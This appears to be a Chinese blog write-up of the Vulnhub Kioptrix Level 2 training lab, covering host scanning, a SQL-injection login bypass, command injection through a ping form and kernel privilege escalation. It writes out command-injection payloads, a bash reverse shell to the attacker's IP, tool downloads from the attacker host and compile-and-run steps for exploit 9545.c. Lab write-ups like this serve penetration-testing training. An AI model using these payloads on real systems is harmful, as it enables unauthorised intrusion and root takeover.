【Vulnhub靶场】Kioptrix Level 2

最新推荐文章于 2025-06-04 19:20:27 发布
最新推荐文章于 2025-06-04 19:20:27 发布
阅读量544 收藏 3
点赞数 15
分类专栏: VulnHub渗透测试靶场 文章标签: linux Vulnhub靶场 漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73442302/article/details/142974475
版权

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

常规 nmap 扫存活主机,扫端口

根据靶机IP容易得出靶机IP为 192.168.118.130

nmap -sP 192.168.118.0/24

nmap -p- 192.168.128.130

 

web渗透

存在web服务,查看web页面,发现存在登录

测试发现存在SQL注入漏洞

使用万能密码尝试登录,发现无法登录,抓取数据包发现是其符号呢被编码,直接修改数据尝试登录,OK了

登录成功,是一个ping功能,当有此功能或者其他执行命令的功能时,都可以合理的怀疑,是否可以拼接其他指令执行,测试发现有存在RCE漏洞,且有回显

127.0.0.1 && id

127.0.0.1;whoami

话不多说,直接反弹Shell走起

nc -lvvp 6666

127.0.0.1;bash -i >& /dev/tcp/192.168.118.128/6666 0>&1

得到Shell,尝试whoami命令,发现是 apache普通用户权限

提权

此时可以用提权辅助工具LinEnum

简介:

LinEnum是一款Linux文件枚举及权限提升检查工具,可以帮助渗透测试人员对linux系统漏洞或安全问题进行一键式测试

下载LinEnum工具:GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

 开启服务,将本机LinEnum.sh文件上传到目标加以利用

python -m http.server 80

cd /tmp

wget 192.168.118.128/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh

 查看到此系统版本信息,推测其可能存在漏洞

尝试查询此漏洞

searchsploit linux 2.6 CentOS

 

 第一个版本信息最为接近,尝试利用

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 /  | linux/local/9545.c

 找到此漏洞exp,然后常规上传到目标

locate linux/local/9545.c

pwd

cp /usr/share/exploitdb/exploits/linux/local/9545.c /root/Desktop

wget 192.168.118.128/9545.c

 编译9545.c脚本文件并运行,whoami尝试,获得root权限

gcc -o exp 9545.c

./exp

反弹Shell

最后bash反弹Shell,成功

nc -lvvp 6666

127.0.0.1;bash -i >& /dev/tcp/192.168.118.128/6666 0>&1

Vunlhub靶场 Kioptrix 2
m0_57221101的博客
02-18 495
这台靶机的搭建很简单,直接用vmware打开vmx文件就可以了 勘探 nmap探查 port 备注 22 openssh 3.9p1 80 apache 2.052 111 rcp 443 631 ipp 3306 sql 80web 443同80 进入发现是一个登陆界面 dirsearch发现了几个目录 python3.9 dirsearch.py -u 192.168.1.105 [20:34:57] 200
【Oscp备考-Kioptrix2
weixin_44126257的博客
09-16 2094
Oscp备考:Kioptrix Level 2
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 749
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
vulnhub——Kioptrix Level 1靶机】
jieli0901227的博客
05-26 717
找到samba 版本信息,通过https://www.exploit-db.com/ 漏洞利用库 查找这个版本有个远程代码执行漏洞,我们试试。Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。下载的文件解压后,编辑 Kioptix Level 1.vmx 文件,删除以 ethernet0开头的行,并保存,发现 MRTG 2.9.6 可能是个应用, 搜索版本可能存在的漏洞,,没有可利用的信息。那么我们尝试这个版本漏洞搜索。
Vulnhub靶场Kioptrix Level 1
good good study day day up
10-15 667
在本地启动HTTP服务器,在目标中下载本地文件 ptrace-kmod.c并编译,然后重新利用漏洞,然后测试发现提权成功,获得root权限。
Vulnhub-Kioptrix Level 2 打靶
a2FpX2tr的博客
12-07 1871
现在功能正常了 nc监听并构造payload反弹shell:127.0.0.1 && /bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'nmap -sn 192.168.213.0/24 #在靶机打开时和未打开时使用这条命令,判断那个IP为靶机。apache 2.0.52有 dos漏洞,也探测出有csrf漏洞,没法getshell,放弃。是一个登录界面,先f12看一下,会不会泄露出是什么cms或发现其他的敏感信息。
Vulnhub靶场 Kioptrix: Level 1.3 (#4) 练习
Reset
02-27 818
netdiscover探测目标主机ip。nmap探测开放的端口和服务。扫描站点目录。根据探测到的数据库文件,获取其他用户的信息。万能密码登录后台。获取账号密码。ssh登录获取到的用户。利用mysql的udf进行提权。
vulnhubKioptrix Level 2
li1136594919的博客
06-09 506
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机。
Vulnhub靶场Kioptrix Level 3
good good study day day up
10-20 523
Vulnhub靶场渗透测试
vulnhub靶场/Kioptrix Level-1.2
qq_45230030的博客
04-18 525
基本是按下载地址中的顺序打的,第二个下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。
Vulnhub靶场 Kioptrix: Level 1.1 (#2) 练习
Reset
01-13 824
netdiscover探测目标主机ip。nmap探测开放的端口和服务。扫描站点目录。从站点查看相关组件的版本信息。利用万能密码进行SQL注入登录到后台。发现系统命令执行功能点。利用系统命令执行功能点进行反弹shell。查看系统版本,centos 4.5。利用系统内核漏洞进行提权。
Vulnhub靶机:Kioptrix_Level1.3
qq_48904485的博客
03-17 589
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1.3(192.168.56.109)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25安装虚拟机:由于下载下来的压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘选择自定义安装操作系统选择linux,版本随便选一个,其他默认即可。
Vulnhub靶场 Kioptrix: Level 1 (#1) 练习
Reset
12-06 743
netdiscover探测目标主机ip。nmap探测开放的端口和服务。扫描站点目录。从站点查看相关组件的版本信息。方法一:mod_ssl 2.8.4a. 利用 nikto 扫描是否有可用漏洞。b. 编译脚本,处理报错。方法二:CVE-2003-0201a. 利用 msf 探测 samba 版本发现相关漏洞。b. 在 msf 中利用该 CVE 进行攻击。方法三:Sambaa. 利用 searchsploit 中的脚本进行攻击。
LinuxLinux 环境变量
最新发布
Antonio915的博客
06-04 645
每个程序都会收到一张环境表,环境表是一个字符指针数组,每个指针指向一个以’\0’结尾的环境字符串。
Rock9.x(Linux安装Redis7
{竹子}
05-31 501
设置后台运行:将daemonize no改为daemonize yes。gcc 是C语言编译器,Redis是用C语言开发的,我们需要编译它。如果没有安装gcc,那么我们手动安装。在解压目录运行命令,必须写sudo。创建存放配置文件的文件夹。解压,进入解压文件夹。
19-项目部署(Linux)
2301_80368429的博客
06-03 1148
不同领域的主流操作系统,主要分为以下这么几类: 桌面操作系统、服务器操作系统、移动设备操作系统、嵌入式操作系统。接下来,这几个领域中,代表性的操作系统是那些?1). 桌面操作系统操作系统特点Windows用户数量最多MacOS操作体验好,办公人士首选Linux用户数量少(桌面操作系统,Linux使用较少)2). 服务器操作系统操作系统特点Unix安全、稳定、付费Linux安全、稳定、免费、占有率高付费、占有率低3). 移动设备操作系统操作系统特点Android。
Linux | Shell脚本的基础知识
2302_81507127的博客
05-29 852
执行一条命令完毕后,系统会给出一个退出值,若成功则为0,出现错误则1~255退出状态码是一个整数,其有效范围为0~255行为良好的UNIX命令,程序和工具都会返回0作为退出码来表示成功。
Linux --进程优先级
2301_79389054的博客
06-03 496
摘要:进程优先级是Linux调度资源的关键机制,通过PRI和NI值控制进程执行顺序。PRI越小优先级越高,NI(-20至19)用于修正PRI值。Linux采用O(1)调度算法,使用active/expired队列和bitmap快速定位待执行进程,当活跃队列耗尽时交换指针。进程切换通过保存/恢复PCB中的上下文数据实现,而task_struct的链表设计允许进程存在于多队列中。通过offsetof宏可计算结构体成员偏移量,实现从链表节点访问完整进程数据。该机制确保调度效率不受进程数量影响。
Linux远程数据同步——rsync命令详解
想进步的职场菜鸟。
05-30 775
rsync是强大的远程数据同步工具,采用差异算法提升传输效率。本文详解参数用法,提供本地/远程同步示例,涵盖权限保留、进度显示等核心功能。
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow_143

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值